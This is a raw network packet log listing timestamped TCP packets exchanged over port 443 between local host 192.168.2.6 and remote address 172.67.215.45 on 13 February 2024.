Feb 13, 2024 21:13:54.988326073 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.988401890 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.988401890 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.988409042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.988501072 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.988569975 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.988584042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.988647938 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.988647938 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.988653898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.988686085 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.989378929 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.989393950 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.989444971 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.989456892 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.989592075 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.990175009 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.990191936 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.990246058 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.990262032 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.990312099 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.990762949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.990778923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.990833044 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.990840912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.990885019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.991173983 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.991189003 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.991554022 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.991561890 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.991628885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.992027998 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.992043018 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.992137909 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.992144108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.992533922 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.993228912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993246078 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993413925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.993419886 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993510008 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993513107 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.993521929 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993552923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993578911 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.993585110 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993634939 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.993634939 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.993840933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993855953 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.993906975 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.993915081 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.994029999 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.994467974 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.994483948 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.994538069 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.994544029 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.994554996 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.994580030 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.995109081 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.995125055 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.995153904 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.995167971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.995203018 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.995203018 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.995417118 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.995431900 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.995465040 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.995471001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.995510101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.995549917 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.996226072 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.996241093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.996279955 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.996287107 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.996337891 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.996504068 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.996519089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.996553898 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.996567965 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.996599913 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.996599913 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.997279882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.997296095 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.997328043 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.997342110 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.997375965 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.997375965 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998086929 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998104095 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998131990 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998147964 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998178959 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998178959 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998646021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998660088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998716116 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998716116 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998723030 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998733997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998771906 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998773098 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998797894 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.998810053 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998845100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.998845100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.999602079 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.999615908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.999660015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.999666929 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.999701023 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.999701023 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.000448942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.000463009 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.000531912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.000576973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.000576973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.000577927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.000600100 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.000639915 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.001370907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.001385927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.001425028 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.001434088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002125025 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002144098 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002186060 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.002194881 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002239943 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.002592087 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002604961 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002645016 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.002665997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002773046 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002790928 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002835035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.002841949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.002888918 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.003685951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.003699064 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.003768921 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.003768921 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.003777027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.003909111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.003926039 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.003973007 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.003979921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.003990889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.004616022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.004630089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.004688025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.004688025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.004694939 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.005610943 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.005630016 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.005659103 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.005672932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.005695105 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.005709887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.005722046 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.005763054 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.005763054 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.005768061 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.006462097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.006479979 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.006517887 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.006525040 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.006570101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.006953955 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.006968021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.007010937 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.007028103 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.007069111 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.007744074 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.007762909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.007812977 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.007818937 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.007831097 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.007920980 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.007935047 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.007992029 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.007992029 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.007998943 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.008661985 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.008680105 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.008708000 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.008721113 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.008754969 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.008955002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.008968115 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.009008884 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.009023905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.009279966 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.009387970 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.009671926 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.009685040 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.009730101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.009736061 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.010437965 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.010454893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.010457993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.010466099 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.010490894 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.010616064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.010782957 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.010796070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.010857105 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.010864973 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.011466026 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.011483908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.011529922 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.011529922 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.011538982 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.011979103 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.011991978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.012037039 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.012044907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.012054920 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.012639999 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.012660027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.012701988 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.012701988 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.012710094 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.012909889 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.012923002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.012964010 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.012972116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.013020992 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.013639927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.013659000 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.013701916 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.013701916 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.013710022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.013775110 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.013788939 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.013834953 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.013844967 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.013868093 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.014658928 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.014678955 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.014704943 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.014714956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.014743090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.014791965 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.014805079 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.014842033 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.014848948 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.014859915 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.015631914 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.015670061 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.015718937 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.015718937 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.015727043 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.015758038 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.015770912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.015813112 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.015813112 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.015820026 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.016680002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.016696930 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.016741037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.016746998 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.016761065 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.016974926 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.016988993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.017077923 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.017085075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.017700911 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.017720938 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.017760992 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.017765999 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.017812967 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.017867088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.017880917 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.017914057 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.017920971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.017932892 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.018661976 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.018678904 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.018727064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.018727064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.018733978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.018834114 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.018846989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.018929958 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.018937111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.019695997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.019712925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.019761086 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.019768000 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.020246029 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.020261049 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.020294905 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.020309925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.020653963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.020673990 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.020721912 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.020721912 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.020729065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.021351099 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.021363020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.021473885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.021481037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.021677971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.021696091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.021737099 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.021737099 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.021744013 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.021755934 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.022346020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.022360086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.022397995 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.022404909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.022747993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.022766113 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.022814035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.022819996 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.022829056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.023258924 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.023272038 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.023463011 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.023469925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.023570061 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.023587942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.023637056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.023637056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.023643017 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.024388075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.024400949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.024439096 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.024445057 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.024544954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.024564981 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.024590015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.024604082 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.024632931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.025244951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.025259018 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.025294065 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.025310040 CET	443	49701	172.67.215.45	192.168.2.6
